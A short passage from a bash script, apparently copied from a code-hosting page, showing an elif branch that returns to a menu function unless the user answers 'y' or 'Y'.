elif [ $back != 'y' ] && [ $back != 'Y' ]
then
menu
fi
View Git Blame Copy Permalink